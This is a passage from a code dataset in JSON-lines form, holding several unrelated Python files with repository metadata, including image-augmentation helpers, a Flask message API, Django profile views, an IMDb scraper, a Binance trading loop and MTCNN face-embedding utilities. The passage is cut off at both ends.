matplotlib.pyplot as plt\n\nimport cv2\nfrom perlin_generator import PerlinGenerator\n\n\ndef get_image_lists():\n    walk_dir = os.path.join(os.getcwd(), 'pap-smear2005')\n    file_list = list(glob.iglob(walk_dir + '**/**/*.BMP', recursive=True))\n\n    normal_cells = []\n    abnormal_cells = []\n\n    for filename in file_list:\n        if 'normal' in filename:\n            normal_cells.append(filename)\n        else:\n            abnormal_cells.append(filename)\n    return normal_cells, abnormal_cells\n\n\ndef load_image(filename):\n    image = cv2.imread(filename)\n    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    return image\n\n\ndef shuffle_dataset(X, y, masks=None):\n    if masks is None:\n        dataset = list(zip(X, y))\n        random.shuffle(dataset)\n        shuffled_X, shuffled_y = zip(*dataset)\n        return list(shuffled_X), list(shuffled_y)\n    else:\n        dataset = list(zip(X, y, masks))\n        random.shuffle(dataset)\n        shuffled_X, shuffled_y, shuffled_m = zip(*dataset)\n        return list(shuffled_X), list(shuffled_y), list(shuffled_m)\n\n\ndef get_smear_set(with_labels=False):\n    normal_cells, abnormal_cells = get_image_lists()\n    images = []\n    labels = []\n    print(\"Healthy cell images: \", len(normal_cells))\n    print(\"Unhealthy cell images: \", len(abnormal_cells))\n    if not with_labels:\n        for filename in normal_cells:\n            images.append(load_image(filename))\n            labels.append(0)\n\n        for filename in abnormal_cells:\n            images.append(load_image(filename))\n            labels.append(1)\n    else:\n        for filename in normal_cells + abnormal_cells:\n            images.append(load_image(filename))\n            labels.append(filename.split('/')[-2])\n    labels = np.array(labels).reshape(-1, 1)\n    return images, labels  # , onehot_encoder.categories_\n\n\ndef augmentation_by_copy(X, y, amount=500):\n    if amount > len(X):\n        amount = len(X) - 1\n    X_copy, y_copy = shuffle_dataset(X, y, None)\n\n    X_aug = X + X_copy[:amount]\n    y_aug = y + y_copy[:amount]\n    return X_aug, y_aug\n\n\ndef augmentation_by_perlin(X, y, masks, amount=500):\n    if amount > len(X):\n        amount = len(X) - 1\n    pg = PerlinGenerator(X, y, masks)\n    X_aug, y_aug = pg.get_augmented_set(amount)\n    return X_aug, y_aug\n\n\ndef get_mask_set():\n    normal_file_cells, abnormal_cells = get_image_lists()\n    images = []\n    for filename in normal_file_cells:\n        images.append(load_image(filename[:-4] + '-d.bmp'))\n    for filename in abnormal_cells:\n        images.append(load_image(filename[:-4] + '-d.bmp'))\n    images = np.array(images)\n    return images\n\n\nif __name__ == '__main__':\n    images, labels = get_smear_set()\n    masks = get_mask_set()\n    ax1 = plt.subplot(211)\n    # ax1.imshow(add_perlin_noise(images[0], masks[0]))\n    ax2 = plt.subplot(212)\n    ax2.imshow(images[0])\n    plt.show()\n\n    # get_smear_set returns only (images, labels); unpacking a third value raised ValueError\n    X_full, y_full = get_smear_set()\n    X_aug, y_aug = augmentation_by_copy(X_full, y_full, 500)\n    print(\"Size of augmented image set: \", len(X_aug))\n    print(\"Size of augmented label set: \", len(y_aug))\n","repo_name":"brykam/wit_augmentation","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26941384284","text":"bird_words = 'hoooowe yyyooouuu duoooiiine'\r\n#bird_words = 'hieeelalaooo'\r\n#bird_words = 'aaa bo cy da eee fe'\r\n\r\ndef translate(phrase: str) -> str:\r\n    result = ''\r\n    vowels = \"aeiouy\"\r\n\r\n    i = 0\r\n    while i < len(phrase):\r\n        result += phrase[i]\r\n        print(\"input: [\"+phrase[i]+\"], i=\"+str(i))\r\n        if phrase[i].isspace():\r\n            print(\"found space, keep it\")\r\n            i += 1\r\n        elif vowels.count(phrase[i]) > 0:\r\n            i += 3\r\n        else:\r\n            i 
+= 2\r\n return result\r\n\r\nprint(translate(bird_words))","repo_name":"mititer/python-study","sub_path":"checkio8.py","file_name":"checkio8.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"895975828","text":"from flask import Flask, redirect, request, url_for, render_template\nimport json\n\n# config\n# server will reload on source changes, and provide a debugger for errors\nDEBUG = True\n\napp = Flask(__name__)\napp.config.from_object(__name__) # consume the configuration above\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nmessage_list = []\n\n# This url handles both GET and POST, with different functionality\n@app.route('/messages', methods=['GET', 'POST'])\ndef messages():\n if request.method == 'GET':\n return json.dumps(message_list) # Convert message_list to a json string\n if request.method == 'POST':\n # request.data contains the json data from client\n msg = json.loads(request.data) # Convert the json string to a python dict\n message_list.append(msg)\n return json.dumps({\"status_message\": \"ok-created\"}) # Return something\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"hack101/lesson5","sub_path":"flask-package/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11995499552","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom soupselect import select\nimport csv\n\nwith open('data/import/episodes.csv', 'r') as episodes:\n reader = csv.reader(episodes, delimiter=',')\n reader.next()\n\n with open('data/import/characters.csv', 'w') as characters:\n writer = csv.writer(characters, delimiter=',')\n writer.writerow([\"EpisodeId\", \"Character\", \"Actor\"])\n\n for row in reader:\n filename = \"imdb/S%s-Ep%s-fullcredits\" %(int(row[3]), int(row[1]))\n # print filename\n characters_page = open(filename, 'r').read()\n soup = BeautifulSoup(characters_page)\n characters = select(soup, 'table.cast_list tr')\n\n for character_row in characters:\n columns = select(character_row, \"td\")\n if len(columns) > 1:\n # print select(select(character_row, \"td.character\")[0], \"a\")\n character = \" \".join(select(character_row, \"td.character\")[0].text.replace(\"\\n\", \"\").split()).encode(\"utf-8\")\n actor = \" \".join(select(character_row, \"td.itemprop\")[0].text.replace(\"\\n\", \"\").split()).encode(\"utf-8\")\n\n characters = character.split(\" / \")\n\n for c in characters:\n c = c.replace(\"(credit only)\", \"\").replace(\"(uncredited)\",\"\").strip()\n\n if c in [\"Himself\", \"Herself\", \"Himself (voice)\", \"Himself - Boyz II Men\"]:\n c = actor\n\n writer.writerow([row[0], c, actor])\n","repo_name":"mneedham/neo4j-himym","sub_path":"scripts/scrape_characters.py","file_name":"scrape_characters.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"40907444600","text":"\"\"\"\nThis file demonstrates two different styles of tests (one doctest and one\nunittest). 
These will both pass when you run \"manage.py test\".\n\nReplace these with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\n\nfrom resources.models import TextResource\nfrom django.contrib import auth\n\n\n\nclass SimpleTest(TestCase):\n def test_basic_TextResource(self):\n \"\"\"\n Creates a TextResource and checks if it has the right text\n \"\"\"\n dummy = auth.models.User(username=\"john\")\n dummy.save()\n\n s = \"alskj aslkj \"\n t = TextResource(text=s, owner=dummy)\n t.save()\n\n self.failUnlessEqual(t.text, s)\n self.failUnlessEqual(t.owner.id, dummy.id)\n\n","repo_name":"kronoschool/kronos","sub_path":"kronos_proj/resources/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5589135373","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n#Ex1\nspace = pd.read_csv(\"space.csv\", delimiter=\";\")\nspace_ = space['Company Name'].where(space['Location'].str.contains('USA')).unique()\nspace__ = space['Company Name'].where(space['Location'].str.contains('China')).unique()\n\nspace_eua = len(space_)\nspace_china = len(space__)\n\nplt.title('Viagens Espaciais')\nplt.xlabel('Países') #Legenda no eixo X\nplt.ylabel('Nº de Viagens') #Legenda no eixo Y\n\nplt.bar('China', space_china, align='center', alpha=0.5)\nplt.bar('EUA', space_eua, align='center', alpha=0.5)\n\nplt.show()\n\n\n#Ex2\npaises = pd.read_csv('paises.csv',delimiter=\";\")\npaises_ = paises[paises['Region'].str.contains(\"NORTHERN AMERICA\")]\n\nplt.xlabel('Países') #Legenda no eixo X\nplt.ylabel('Natalidade e Mortalidade') #Legenda no eixo Y\nplt.title('Taxa de Natalidade e Mortalidade na America do Norte')\nplt.plot(paises_['Country'], paises_['Birthrate'], 'o:r', paises_['Country'], paises_['Deathrate'], '*:b' )\n\nplt.show()\n\n","repo_name":"IASR19/C111","sub_path":"ExCap6_C111_Itamar_GES.py","file_name":"ExCap6_C111_Itamar_GES.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7945812047","text":"from typing import List\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect\nfrom django.urls import reverse_lazy\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.translation import gettext as _\nfrom django.views.generic import CreateView\nfrom django.views.generic import DetailView\nfrom django.views.generic import UpdateView\n\nfrom base import mixins\nfrom base import utils\nfrom keycloakauth.utils import update_user_groups\nfrom . import forms\nfrom . 
import models\nfrom .rules import has_profile\n\nlogger = logging.getLogger(__name__)\n\n\ndef activate_language(language_code, request):\n logger.debug(\"activate_language called\")\n translation.activate(language_code)\n request.session[translation.LANGUAGE_SESSION_KEY] = language_code\n\n\nclass UserProfileMixin(object):\n\n def get_object(self, queryset=None):\n user = self.request.user\n return user.profile if has_profile(user) else False\n\n\nclass PrivilegedUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.PrivilegedUserProfile\n template_name_suffix = \"_create\"\n success_url = settings.LOGOUT_URL\n permission_required = \"profiles.can_create_profile\"\n fields = ()\n admin_email_subject_template_name = (\n \"profiles/mail/privilegeduser_registration_request_subject.txt\")\n admin_email_message_template_name = (\n \"profiles/mail/privilegeduser_registration_request_message.txt\")\n\n @property\n def success_message(self):\n return _(\"Privileged user profile created!\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n super().form_valid(form)\n id_token = self.request.session.get(\"id_token\")\n try:\n update_user_groups(\n user=self.request.user,\n user_profile=settings.PRIVILEGED_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n result = redirect(\"home\")\n except RuntimeError:\n messages.info(\n self.request, _(\"Registration request sent to admins\"))\n messages.info(self.request, _(\"You have been logged out\"))\n utils.send_email_to_admins(\n self.admin_email_subject_template_name,\n self.admin_email_message_template_name,\n context={\n \"username\": self.request.user.username,\n \"email\": self.request.user.email,\n \"keycloak_base_url\": settings.KEYCLOAK[\"base_url\"],\n \"site_name\": get_current_site(self.request),\n }\n )\n result = redirect(settings.LOGOUT_URL)\n else:\n result = self.form_invalid(form)\n return result\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(data=data, instance=self.request.user)\n\n\nclass EndUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n \"\"\"Profile completion view\n\n This view uses two forms, one for the completion of the user profile and\n another for the mobility habits survey.\n\n \"\"\"\n\n model = models.EndUserProfile\n form_class = forms.EndUserProfileForm\n template_name_suffix = \"_create\"\n permission_required = \"profiles.can_create_profile\"\n success_url = 
reverse_lazy(\"bikes:list\")\n\n @property\n def goto(self):\n return \"bikes:list\"\n\n @property\n def success_message(self):\n return _(\"User profile created. You can now add some bikes\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(self._get_extra_forms())\n return context\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n This key is used in order to sync group memberships with keycloak.\n\n \"\"\"\n\n form.instance.user = self.request.user\n # validate extra forms before saving anything\n extra_forms = self._get_extra_forms()\n if all([f.is_valid() for f in extra_forms.values()]):\n super().form_valid(form)\n # upon calling super().form_valid(form) the property self.object\n # points to the newly created enduser profile\n mobility_form = extra_forms[\"mobility_form\"]\n mobility_form.instance.end_user = self.object\n mobility_form.save()\n user_form = extra_forms[\"user_form\"]\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = redirect(self.get_success_url())\n id_token = self.request.session.get(\"id_token\")\n update_user_groups(\n user=self.request.user,\n user_profile=settings.END_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n else:\n response = self.form_invalid(form)\n logger.debug(\"response: {}\".format(response))\n return response\n\n def form_invalid(self, form):\n extra_forms = self._get_extra_forms()\n return self.render_to_response(\n self.get_context_data(form=form, **extra_forms))\n\n def _get_extra_forms(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return {\n \"user_form\": forms.SmbUserForm(data=data,\n instance=self.request.user),\n \"mobility_form\": forms.UserMobilityHabitsForm(data=data)\n }\n\n\nclass ProfileUpdateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.UserHasObjectPermissionMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n UpdateView):\n permission_required = \"profiles.can_edit_profile\"\n\n @property\n def success_message(self):\n return _(\"User profile updated!\")\n\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_template_names(self):\n profile_class = type(self.request.user.profile)\n template_name = {\n models.EndUserProfile: \"profiles/enduserprofile_update.html\",\n models.PrivilegedUserProfile: (\n \"profiles/privilegeduserprofile_update.html\"),\n }.get(profile_class)\n return [template_name]\n\n def get_queryset(self):\n profile_class = type(self.request.user.profile)\n return profile_class.objects.get(pk=self.request.user.profile.pk)\n\n def get_form_class(self):\n profile_class = type(self.request.user.profile)\n return {\n models.EndUserProfile: forms.EndUserProfileForm,\n models.PrivilegedUserProfile: forms.PrivilegedUserProfileForm,\n }.get(profile_class)\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def 
get_login_url(self):\n if not self.request.user.is_authenticated:\n result = settings.LOGIN_URL\n else:\n messages.info(\n self.request,\n _(\"Please complete your user profile before continuing\")\n )\n result = reverse(\"profile:create\")\n return result\n\n def form_valid(self, form):\n \"\"\"Process uploaded form data after the form has been validated\n\n Reimplemented in order to also perform validation on the other form,\n for the SmbUser model, and handle all uploaded data.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = super().form_valid(form)\n else:\n response = self.form_invalid(form)\n return response\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(\n data=data,\n instance=self.request.user,\n include_accept_terms_field=False\n )\n\n\nclass MobilityHabitsSurveyCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n form_class = forms.UserMobilityHabitsForm\n template_name_suffix = \"_create\"\n success_url = reverse_lazy(\"profile:update\")\n permission_required = \"profiles.can_edit_profile\"\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n else:\n raise PermissionDenied()\n\n def form_valid(self, form):\n form.instance.end_user = self.request.user.profile\n return super().form_valid(form)\n\n\nclass MobilityHabitsSurveyDetailView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.AjaxTemplateMixin,\n DetailView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n permission_required = \"profiles.can_view_profile\"\n ajax_template_name = \"profiles/mobilityhabitssurvey_detail_inner.html\"\n","repo_name":"geosolutions-it/smb-portal","sub_path":"smbportal/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31946586534","text":"from typing import List, Tuple\nfrom pygame import camera, image\nfrom time import sleep\nfrom PIL import BmpImagePlugin\n\ndef getCamera(cam: str, size: Tuple):\n camera.init()\n cam = camera.Camera(cam, size)\n cam.start()\n sleep(1)\n return cam\n\ndef split(arr: List, x: int) -> List:\n res = []\n last = 0\n for [k, i] in enumerate(arr):\n if k - last + 1 == x:\n res.append(arr[last:k+1])\n last = k + 1\n return res\n\ndef flatten(item) -> List:\n res = []\n if isinstance(item, List):\n for i in item:\n res += flatten(i)\n else:\n res.append(item)\n return res\n\ndef coordInBox(coord: Tuple[int, int], box: Tuple[int, int, int, int]) -> bool:\n x, y = coord\n l, t, r, b = box\n return y >= t and y <= b and x >= l and x <= r\n\ndef fillWithBlank(file:str, box: Tuple, dest: str, fill: Tuple = (0, 0, 200), negative=False):\n img = BmpImagePlugin.BmpImageFile(file)\n flat = 
bytearray(img.tobytes())\n    pixels_flat = split(list(flat), 3)  # concat rgb channels (3b) into one pixel\n    pixels_2d = split(pixels_flat, img.size[0])  # concat pixels into height => width\n\n    for [k_h, h] in enumerate(pixels_2d):\n        for [k_w, pixel] in enumerate(h):\n            # if k_h >= t and k_h <= b and k_w >= l and k_w <= r:\n            if coordInBox((k_w, k_h), box) == (not(negative)):\n                pixels_2d[k_h][k_w] = list(fill)\n    edited_flat = flatten(pixels_2d)\n    result = img.copy()\n    result.frombytes(bytes(edited_flat))\n    result.save(dest)\n\ndef savePicture(cam: str, size: Tuple, saveFile: str) -> None:\n    img = getCamera(cam, size).get_image()\n    image.save(img, saveFile, \"bmp\")\n\nif __name__ == '__main__':\n    # savePicture(\"FHD Webcam\", (512, 384), \"../../real_images/25.bmp\")\n    # savePicture(\"FHD Webcam\", (512, 384), saveFile=\"../../real_images/30.bmp\")\n    fillWithBlank(\"../../real_images/30.bmp\", (60, 96, 255, 209), \"../../real_images/31.bmp\", (255, 255, 255), negative=True)\n\n    # fillWithBlank(\"../../real_images/20.bmp\", (0, 0, 50, 50), \"../../real_images/x.bmp\", fill=(90, 250, 2), negative=True)\n    pass\n# a = [1, 2, 3, 4, 5, 6, 7, 8,9]\n# b = split(a, 3)\n# print(b)\n","repo_name":"finnstamer/trash-recognition","sub_path":"interface/camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10448886636","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass HttpQuery:\n\n    def __init__(self, url):\n        self.url = url\n        self.r = requests.get(self.url)\n\n    def get_html_page(self):\n\n        if self.r.status_code == 200:\n            print('status code :', self.r.status_code)\n            return self.r.text\n        else:\n            # bare 'r' was undefined here (NameError); report the stored response's status\n            print(self.r.status_code)\n\nclass ElementPage:\n\n    def __init__(self, html):\n        self.html = html\n        self.soup = BeautifulSoup(self.html, 'lxml')\n\n    def parent_page_element(self):\n\n        abc = self.soup.find('div', class_='body').find_all('div', class_='section')\n        res_text = []\n        for row in abc:\n            if row != '':\n                div_p = row.find_all('p')\n                for row in div_p:\n                    try:\n                        text_p = row.text\n                    except:\n                        # the original compared (text_p != '') instead of assigning; assign so text_p is always bound\n                        text_p = ''\n                    if text_p != '':\n                        res_text.append(text_p)\n        return res_text\n","repo_name":"hitruk/pop_eng","sub_path":"page_obj/parent_page.py","file_name":"parent_page.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24678682707","text":"from peewee import Model, SqliteDatabase, CharField, DateField, BooleanField\nfrom datetime import date, datetime\nimport datetime as dt\n\n\ndb = SqliteDatabase('roadtax_date.db')\n\n\nclass Vehicle(Model):\n    vehicle_no = CharField(primary_key=True)\n    expiry_date = DateField()\n    is_informed = BooleanField(default=False)\n    is_inspected = BooleanField(default=False)\n    is_renewed = BooleanField(default=False)\n\n    # @classmethod\n    # def create(cls, vehicle_no, expiry_date):\n    #     # WIP\n    #     # parsed_date = None\n    #     # super(vehicle_no=vehicle_no, expiry_date=_parse_date(expiry_date))\n    #     return\n\n    @staticmethod\n    def _parse_date(date):\n        if type(date) is datetime:\n            return date\n        try:\n            return datetime.strptime(date, '%d/%m/%Y')\n        except ValueError:\n            # the old trailing 'raise' was unreachable; raise the clear message from here instead\n            try:\n                return datetime.strptime(date, '%d.%m.%Y')\n            except ValueError:\n                raise ValueError(\"date format must be dd.mm.YYYY\")\n\n    class Meta:\n        database = db\n\n\nclass Crud:\n    def add_new(self, vehicle, expiry):\n        try:\n            self.parsed_date = datetime.strptime(expiry, '%d/%m/%Y')\n            self.create_new = Vehicle.create(\n                
vehicle_no=vehicle, expiry_date=self.parsed_date)\n return \"New record created\"\n except ValueError:\n try:\n self.parsed_date = datetime.strptime(expiry, '%d.%m.%Y')\n self.create_new = Vehicle.create(\n vehicle_no=vehicle, expiry_date=self.parsed_date)\n return \"New record created\"\n except:\n self.msg = \"date format must be dd.mm.YYYY\"\n return self.msg if vehicle else None\n\n except:\n self.update_row = (Vehicle\n .update(expiry_date=self.parsed_date)\n .where(Vehicle.vehicle_no == vehicle)\n .execute())\n return \"Attempting to make change to existing vehicle.\"\n finally:\n db.close()\n\n def sort_all(self):\n self.query_orderby = Vehicle.select().order_by(Vehicle.expiry_date)\n self.display = []\n for item in self.query_orderby:\n self.display.append([item.vehicle_no, item.expiry_date, item.is_informed,\n item.is_inspected, item.is_renewed])\n db.close()\n return list(self.display)\n\n def sort_within(self, day):\n self.day = 1 if day == '' else day\n self.withindays = dt.timedelta(days=int(self.day))\n self.display = []\n self.query_within_days = Vehicle.select().where(Vehicle.expiry_date <=\n date.today() + self.withindays).order_by(Vehicle.expiry_date)\n for item in self.query_within_days:\n self.display.append([item.vehicle_no, date.strftime(item.expiry_date, '%d/%m/%Y'), item.is_informed,\n item.is_inspected, item.is_renewed])\n db.close()\n return self.display\n\n def update_checks(self,\n vehicle,\n expiry,\n inform=False,\n inspect=False,\n renew=False):\n if vehicle is None:\n return None\n try:\n self.parsed_date = datetime.strptime(expiry, '%d/%m/%Y')\n except:\n pass\n self.update_row = (Vehicle\n .update(is_informed=inform,\n is_inspected=inspect,\n is_renewed=renew,\n expiry_date=self.parsed_date + dt.timedelta(days=182.5))\n .where(Vehicle.vehicle_no == vehicle)\n .execute())\n db.close()\n if inform and inspect and renew:\n return f\"{vehicle} renewed, expiry date updated to 6 months from now.\"\n return f\"{vehicle} updated\"\n\n def delete_item(self, vehicle):\n if vehicle is None:\n return None\n self.del_it = Vehicle.delete().where(Vehicle.vehicle_no == vehicle).execute()\n db.close()\n return f\"{vehicle} Deleted!\"\n\ndb.connect()\n# print(db.get_tables()) # Printing all the tables in database\ndb.create_tables([Vehicle])\ndb.close()\n","repo_name":"Stewart86/roadtaxTracker","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"21757525630","text":"import time\nimport traceback\nimport requests\n\nfrom library import setup_logger, TradeAsset, get_remaining_btc_binance, adjust_buy_asset_btc_volume, start_trading\n\ntrade_assets = [\n TradeAsset('CELR'),\n TradeAsset('FTM'),\n TradeAsset('ONE'),\n TradeAsset('MATIC'),\n TradeAsset('ALGO')\n ]\n\nlogger = setup_logger(\"trader\")\n\nwhile 1:\n try:\n _btc = get_remaining_btc_binance()\n btc_value = 0.0013 if _btc > 0.0013 else _btc\n adjust_buy_asset_btc_volume(trade_assets, btc_value)\n\n for trade_asset in trade_assets: # remove asset from here\n start_trading(trade_asset, btc_value)\n\n time.sleep(40)\n except Exception as err:\n if isinstance(err, requests.exceptions.ConnectionError):\n logger.error(\"Connection problem...\")\n else:\n traceback.print_tb(err.__traceback__)\n 
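# note: logger.exception normally takes a message string; passing the traceback object logs only its repr\n            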
logger.exception(err.__traceback__)","repo_name":"sroziewski/trading-bot","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44697813308","text":"import matplotlib.pyplot as plt\nfrom mtcnn.mtcnn import MTCNN\nfrom numpy import expand_dims\nfrom numpy import asarray\nfrom keras.models import load_model\nimport numpy as np\nimport cv2\nimport os\nfrom PIL import Image\nimport argparse\nimport pickle\nimport os\nimport sys\n\nif not sys.warnoptions:\n import warnings\n warnings.simplefilter(\"ignore\")\n\ndef get_faces_cropped_from_input(detector, input_dir):\n required_size = (160,160)\n img_file_lst = os.listdir(input_dir)\n cropped_faces_array_list = []\n\n for img_file in img_file_lst:\n path = input_dir + \"/\" + img_file\n img = plt.imread(path)\n # detect faces in the image\n face = detector.detect_faces(img)\n if face:\n bbox = face[0]['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n\n return cropped_faces_array_list\n\ndef get_faces_cropped_from_videos_prediction(detector, img):\n required_size = (160, 160)\n # img_file_lst = os.listdir(predict_dir)\n cropped_faces_array_list = []\n face_location = []\n # img = plt.imread(path)\n\n\n # detect faces in the image\n face = detector.detect_faces(img)\n for face in face:\n if face['confidence'] > 0.90:\n bbox = face['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n face_location.append(face)\n\n dict = {\n \"face_location\": face_location,\n \"cropped_faces_array_list\": cropped_faces_array_list\n }\n\n return cropped_faces_array_list, face_location, dict\n\ndef get_faces_cropped_from_prediction(detector, path):\n required_size = (160, 160)\n # img_file_lst = os.listdir(predict_dir)\n cropped_faces_array_list = []\n face_location = []\n img = plt.imread(path)\n\n\n # detect faces in the image\n face = detector.detect_faces(img)\n for face in face:\n if face['confidence'] > 0.90:\n bbox = face['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n face_location.append(face)\n\n dict = {\n \"face_location\": face_location,\n \"cropped_faces_array_list\": cropped_faces_array_list\n }\n\n return cropped_faces_array_list, face_location, dict\n\ndef get_faces_cropped_from_prediction_video(detector, img):\n required_size = (160, 160)\n # img_file_lst = os.listdir(predict_dir)\n cropped_faces_array_list = []\n face_location = []\n # img = plt.imread(path)\n\n\n # detect faces in the image\n face = detector.detect_faces(img)\n if not face:\n pass\n for face in face:\n if face['confidence'] > 
0.90:\n bbox = face['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n face_location.append(face)\n\n dict = {\n \"face_location\": face_location,\n \"cropped_faces_array_list\": cropped_faces_array_list\n }\n\n return cropped_faces_array_list, face_location, dict\n\ndef get_embedding(model, cropped_face_list):\n\n embeddibgs = []\n for cropped_face in cropped_face_list:\n cropped_face = cropped_face.astype('float32')\n # standardize pixel values across channels (global)\n mean, std = cropped_face.mean(), cropped_face.std()\n cropped_face = (cropped_face - mean) / std\n # transform face into one sample\n samples = expand_dims(cropped_face, axis=0)\n # make prediction to get embedding\n yhat = model.predict(samples)\n embeddibgs.append(yhat[0])\n return embeddibgs\n\ndef euclidean(x,y):\n return np.sqrt(np.sum((x-y)**2))\n\ndef get_face_names(input_dir):\n\n img_file_lst = os.listdir(input_dir)\n known_face_names = []\n for img_file in img_file_lst:\n img_name = img_file.rsplit(\".\", 1)[0]\n 